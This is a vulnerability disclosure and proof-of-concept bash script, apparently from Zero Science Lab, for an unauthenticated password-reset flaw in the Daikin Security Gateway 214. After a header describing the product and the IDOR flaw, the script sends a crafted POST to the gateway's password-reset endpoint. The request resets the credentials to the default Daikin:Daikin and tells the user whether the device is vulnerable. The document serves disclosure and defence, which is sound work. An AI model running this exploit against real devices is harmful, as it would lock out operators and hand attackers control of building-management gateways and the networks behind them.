# Daikin Security Gateway 214 - Remote Password Reset
# Vendor: Daikin Industries, Ltd.
# Product web page: https://www.daikin.com
# https://www.daikin.eu/en_us/products/product.html/DRGATEWAYAA.html
# Affected version: App: 100, Frm: 214
#
# Summary: The Security gateway allows the iTM and LC8 controllers
# to connect through the Security gateway to the Daikin Cloud Service.
# Instead of sending the report to the router directly, the iTM or
# LC8 controller sends the report to the Security gateway first. The
# Security gateway transforms the report format from http to https
# and then sends the transformed https report to the Daikin Cloud
# Service via the router. Built-in LAN adapter enabling online control.
#
# Desc: The Daikin Security Gateway exposes a critical vulnerability
# in its password reset API endpoint. Due to an IDOR flaw, an unauthenticated
# attacker can send a crafted POST request to this endpoint, bypassing
# authentication mechanisms. Successful exploitation resets the system
# credentials to the default Daikin:Daikin username and password combination.
# This allows attackers to gain unauthorized access to the system without
# prior credentials, potentially compromising connected devices and networks.
#
# Tested on: fasthttp
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2025-5931
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5931.php
#
#
# 21.03.2025
#
[ $# -ne 1 ] && { echo "Usage: $0 <target_ip>"; exit 1; }
TARGET_IP="$1"
URL="https://$TARGET_IP/api/settings/password/reset"
PAYLOAD="t00t"
[[ ! $TARGET_IP =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && { echo "Bad IP."; exit 1; }
RESPONSE=$(curl -kX POST "$URL" -H "Content-type: application/json" -d "$PAYLOAD" 2>/dev/null)
[ $? -ne 0 ] && { echo "Can’t reach $TARGET_IP."; exit 1; }
if [[ $RESPONSE =~ \"Error\":0 ]]; then
echo "Reset worked! Vulnerable."
elif [[ $RESPONSE =~ \"Error\":1 ]]; then
echo "Not vulnerable."
else
echo "Got: $RESPONSE"
fi
